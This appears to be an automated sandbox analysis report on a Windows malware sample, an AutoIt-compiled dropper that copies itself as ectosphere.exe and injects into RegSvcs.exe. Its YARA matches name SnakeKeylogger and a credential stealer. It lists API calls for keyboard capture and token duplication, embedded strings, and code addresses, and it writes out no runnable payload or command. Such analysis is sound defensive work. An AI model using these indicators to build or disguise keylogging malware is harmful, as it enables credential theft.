                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0031001C
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0033CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0033CABC
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_000ACABC

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000003.00000002.4526688861.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: This is a third-party compiled AutoIt script.0_2_002B3B3A
                Source: 6BRa130JDj.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 6BRa130JDj.exe, 00000000.00000000.2056309027.0000000000364000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9676f84d-e
                Source: 6BRa130JDj.exe, 00000000.00000000.2056309027.0000000000364000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7449699a-a
                Source: 6BRa130JDj.exe, 00000000.00000003.2092314926.00000000033B3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c0984969-b
                Source: 6BRa130JDj.exe, 00000000.00000003.2092314926.00000000033B3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_a4f32389-2
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: This is a third-party compiled AutoIt script.2_2_00023B3A
                Source: ectosphere.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ectosphere.exe, 00000002.00000002.2131693043.00000000000D4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_76b2873c-1
                Source: ectosphere.exe, 00000002.00000002.2131693043.00000000000D4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e93448e0-3
                Source: ectosphere.exe, 00000006.00000002.2290219880.00000000000D4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_219298c8-5
                Source: ectosphere.exe, 00000006.00000002.2290219880.00000000000D4000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_18ec02c7-2
                Source: 6BRa130JDj.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cdf203a7-1
                Source: 6BRa130JDj.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0c6da13a-f
                Source: ectosphere.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_03f4443e-2
                Source: ectosphere.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d0b79744-d
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0031A1EF
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00308310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00308310
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003151BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003151BD
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_000851BD
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002BE6A00_2_002BE6A0
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002DD9750_2_002DD975
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002BFCE00_2_002BFCE0
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D21C50_2_002D21C5
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E62D20_2_002E62D2
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003303DA0_2_003303DA
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E242E0_2_002E242E
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D25FA0_2_002D25FA
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0030E6160_2_0030E616
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002C66E10_2_002C66E1
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E878F0_2_002E878F
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002C88080_2_002C8808
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003308570_2_00330857
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E68440_2_002E6844
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003188890_2_00318889
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002DCB210_2_002DCB21
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E6DB60_2_002E6DB6
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002C6F9E0_2_002C6F9E
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002C30300_2_002C3030
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D31870_2_002D3187
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002DF1D90_2_002DF1D9
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B12870_2_002B1287
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D14840_2_002D1484
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002C55200_2_002C5520
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D76960_2_002D7696
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002C57600_2_002C5760
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D19780_2_002D1978
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E9AB50_2_002E9AB5
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002DBDA60_2_002DBDA6
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002D1D900_2_002D1D90
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00337DDB0_2_00337DDB
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002BDF000_2_002BDF00
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002C3FE00_2_002C3FE0
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0116BF880_2_0116BF88
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0002E6A02_2_0002E6A0
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0004D9752_2_0004D975
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0002FCE02_2_0002FCE0
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000421C52_2_000421C5
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000562D22_2_000562D2
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000A03DA2_2_000A03DA
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0005242E2_2_0005242E
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000425FA2_2_000425FA
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0007E6162_2_0007E616
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000366E12_2_000366E1
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0005878F2_2_0005878F
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000388082_2_00038808
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000568442_2_00056844
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000A08572_2_000A0857
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000888892_2_00088889
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0004CB212_2_0004CB21
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00056DB62_2_00056DB6
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00036F9E2_2_00036F9E
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000330302_2_00033030
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000431872_2_00043187
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0004F1D92_2_0004F1D9
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000212872_2_00021287
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000414842_2_00041484
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000355202_2_00035520
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000476962_2_00047696
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000357602_2_00035760
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000419782_2_00041978
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00059AB52_2_00059AB5
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00041D902_2_00041D90
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0004BDA62_2_0004BDA6
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000A7DDB2_2_000A7DDB
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0002DF002_2_0002DF00
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00033FE02_2_00033FE0
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00F6E6002_2_00F6E600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012471183_2_01247118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124C1473_2_0124C147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124A0883_2_0124A088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012453623_2_01245362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124D2783_2_0124D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124C4683_2_0124C468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012464983_2_01246498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124C7383_2_0124C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012476F13_2_012476F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012469A03_2_012469A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124E9883_2_0124E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01249A203_2_01249A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124CA083_2_0124CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124CCD83_2_0124CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124CFAA3_2_0124CFAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01243E093_2_01243E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124F9613_2_0124F961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0124E97A3_2_0124E97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_012429EC3_2_012429EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01243AB13_2_01243AB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E1E803_2_066E1E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E17A03_2_066E17A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EFC683_2_066EFC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E9C703_2_066E9C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E95483_2_066E9548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EE2583_2_066EE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E0B303_2_066E0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E50283_2_066E5028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E29683_2_066E2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E1E703_2_066E1E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EDE003_2_066EDE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EE6AF3_2_066EE6AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EE6A03_2_066EE6A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EE6B03_2_066EE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EEF603_2_066EEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EEF513_2_066EEF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E178F3_2_066E178F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066ECCA03_2_066ECCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066ED5403_2_066ED540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066ED5503_2_066ED550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EDDFF3_2_066EDDFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EDDF13_2_066EDDF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EE2493_2_066EE249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EEAF83_2_066EEAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E93283_2_066E9328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E0B203_2_066E0B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EEB083_2_066EEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E9BFA3_2_066E9BFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E8BA03_2_066E8BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EF3B83_2_066EF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E8B913_2_066E8B91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E00403_2_066E0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E00063_2_066E0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EF8013_2_066EF801
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E50183_2_066E5018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066EF8103_2_066EF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066ED0F83_2_066ED0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066E29593_2_066E2959
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066ED9A83_2_066ED9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_066ED9993_2_066ED999
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 6_2_01B41B786_2_01B41B78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189C1467_2_0189C146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_018953627_2_01895362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189D2787_2_0189D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189C4687_2_0189C468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189C7387_2_0189C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189E9887_2_0189E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_018969A07_2_018969A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189CA087_2_0189CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01899DE07_2_01899DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189CCD87_2_0189CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189CFAA7_2_0189CFAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01896FC87_2_01896FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_018929EC7_2_018929EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_018939F07_2_018939F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189F9617_2_0189F961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0189E97A7_2_0189E97A
